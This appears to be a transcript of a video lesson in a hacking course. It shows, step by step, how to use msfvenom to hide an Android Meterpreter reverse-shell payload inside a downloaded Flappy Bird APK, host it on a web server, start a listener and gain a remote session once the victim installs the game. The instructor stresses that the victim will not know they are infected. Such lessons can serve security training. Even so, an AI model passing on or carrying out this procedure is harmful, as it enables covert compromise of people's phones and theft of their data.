Instructor: Welcome back. Time to perform an advanced attack on an Android device, or should I say this is more of a social engineering attack, because we are tricking the target into installing an application that is infected with our payload.

Remember in one of the previous videos from the Android section where I showed you that we actually had the Flappy Bird application right here in the Android applications? Well, you don't see it now because I deleted it. But that application was actually infected with our payload, and I'm going to show you right now how we can do that.

The first thing that you want to do is, first of all, follow this tutorial. And in case something doesn't work, you want to run these commands. I will just type them right now. In case you watch this entire tutorial and something doesn't work, make sure to run these three commands and try it again. The first command would be apt-get remove apktool. Once again, don't run this right now; I'm just showing it to you. After you execute this command, you would want to navigate to Firefox and type Apktool, and from the first link you want to click on "how to install". This will lead you to the installation of Apktool, and you want to navigate to the Linux installation and follow these steps right here. Once you follow these steps and install Apktool, the last command that you want to run is apt-get install zipalign. But we're not going to run this at the moment. We're only going to run this in case something doesn't work.

So let's give it a try. Let's create a payload and infect the Flappy Bird application with it. For this to work, we're going to need an actual payload, and we are also going to need the Flappy Bird application. Let's go with Flappy Bird first. We all know the game; most of you probably even played the game. So in order to download that, we want to be searching for the apk file. Remember, apk is something that we can run on Android. So if I type "Flappy Bird apk" and I search for it, I will find this link that says flappy dash bird dot en dot up down dot com. Click on that link; it'll say Flappy Bird 1.3 version, and we want to download and click on this latest version right here. Click on download. It'll open this window. We want to click on save file and then click on OK. Once it finishes downloading, we want to navigate to this arrow and open the folder where we have our Flappy Bird apk file installed.

Let's also create our payload in this directory. So open a terminal here. It'll open the terminal in this /Downloads directory. Let me just zoom this in so you can see everything better. Once we do that, I can type ls and I will have this Flappy Bird application right here. In order to inject our payload into this, we're going to use the good old dash x option from msfvenom, and we're going to specify the Flappy Bird apk file right here. Remember what dash x means. It means that it'll try to inject our payload into this application right here. All we are left to do right now is select the payload, which is going to be the good old meterpreter. We want to set the LHOST to be the IP address of our Kali Linux machine, and LPORT to be any port that you want. In our case, I'm just going to use five five five five as usual. And the last option is dash o, and let's just call it test.apk.

Before you run it, just double check everything. You downloaded the Flappy Bird application; make sure that it is an apk file, or that it has this .apk extension. You selected the correct payload. You selected the correct IP address. Once all of that is done, you can press enter right here. While this is being executed, let's go to the second terminal and start our Apache2 web server. Let's go back, and we do get some error right here. Okay, so we got an error. What are we going to do? Let's run those three commands that I told you. So the first one is sudo apt-get remove apktool.

(Instructor typing)

Enter the password. It even tells us Apktool is not installed. Okay, we're going to ignore this at the moment and we are going to go to the official Apktool site. So what does it say right here? Download Linux wrapper script. Let's go there. It will open this script. Let's press Ctrl+A to select everything and then copy it. Once we copy it, it'll tell us the next step, which is download Apktool. But before you do that, it tells us to right click and save link as Apktool. So we already copied the content of that. Let's just go nano Apktool. Let's paste everything that we copied right here. We can save this as Apktool. The next step is going to be download Apktool 2. Let's go find newest here. They gave us the link. Once we go right here, we want to download the newest one, which is Apktool 2.4.1. Let's click on that. Let's save the file. In just a few seconds it should finish the download. Let's go back to check out what the third step is. So we rename the downloaded jar file to Apktool.jar. Hmm, let's do that. It is in our Downloads directory, and it seems that we actually have two of these. So what I'm going to do is remove the first one, and I'm going to rename the second one to... What did it say? Let's double check. We want to rename it to Apktool.jar. So let's do that: mv Apktool to Apktool.jar.

Okay, great. The fourth step is move both of these files that we just downloaded and created to this location right here. It even tells us root is needed for this. So let's enter the root account. Let's move first the Apktool to /usr/local/bin, and after that we can move the Apktool.jar to /usr/local/bin. Great. The fifth step is make sure both files are executable. For this, we must navigate to that actual directory, and type chmod +x Apktool and chmod +x Apktool.jar. Great. The last step is try running Apktool via command line. So if I just type Apktool... Awesome, it works.

So another thing that you might want to give a try, in case our payload creation still doesn't work, is to make sure that you're running the command as the root account. Matter of fact, we're going to try to create a payload right now as the root account. We are not going to go back to the regular user. Once you do that, let's go and type the same command. Once again, make sure that you're on the root account. We want to type the dash x option, select our Flappy Bird apk file, then dash p for the payload, and LHOST and LPORT, and at the end dash o. Now let's call it test.apk. Press enter and let's see whether it will work right now. So this command can take a few seconds to actually execute, and if we don't get any error, that means our command worked. And here it is. It finished with no errors. It went through all of these steps of unpacking the apk and setting all of the permission options for our application. We got the payload size right here, and it's saved as test.apk. Now if you still got an error, try running this command as well, which is apt-get install zipalign. After this installs, try creating the payload once again and see if it works then.

But since we already got our payload right here, let's copy it or move it to /var/www/html. Once again, make sure Apache2 is started. If I go right here, go and visit the Google Home. While this opens, what I'm going to do is run msfconsole. I'm going to close all of these previous tabs, as we don't really need them. Let's just wait for msfconsole to open, and while it does that, let's refresh our page. Here is our test.apk. You will notice that our payload size is significantly larger than the previous payloads that we used. This is due to us adding this inside of Flappy Bird. So we are not only going to run the actual payload, but we are also going to run the game Flappy Bird. The target will have no idea that in the background they executed our meterpreter reverse shell. Let's go and set up all of the settings right here: use exploit multi handler, set payload to android meterpreter reverse tcp, set LHOST, set LPORT, and run the reverse TCP handler. Great.

Once it does that, we can click on the test.apk. It'll ask us whether we want to download. I'm going to click on download, open the test.apk, and go through these settings. Just a quick note: see right here that the name of the actual application is different. It's called Flappy Bird and it has a different icon than our previous payloads. So if the target sees this, they will think that they're downloading a regular Flappy Bird application. Let's click on install. Install anyway. Let's click first on "don't send" and run the application. You will see straight away it actually went inside the Flappy Bird game. You can see it opened right here. But if we go back to Kali Linux, we got our meterpreter session right here, and we can execute all of the commands that we were able to execute with our previous payloads. How cool is that? Our target will have no idea that they have been infected, because they just opened the application that they thought they were running.

Now you don't have to use Flappy Bird. You can use any other application whatsoever, as long as it has the .apk extension. Great. Now that we did this, in the next video I will show you a way of how you can infect a target in a different network. So there is one way which is called port forwarding, but for that way you need to actually have access to your router. In case you don't have access to your router, there is a second way by using a certain tool that we will cover in the next video. But before we do that, let's give Flappy Bird a try. Let's play it once, and let's see who will have a better score.

(bird thuds)

It is going a little bit slow because it is a virtual machine.

(bell clanging)

Nonetheless, you can see that the game works. I actually didn't go far; I made it only two points. If you do better, make sure you post it in the questions. Nonetheless, let's get straight into the next video.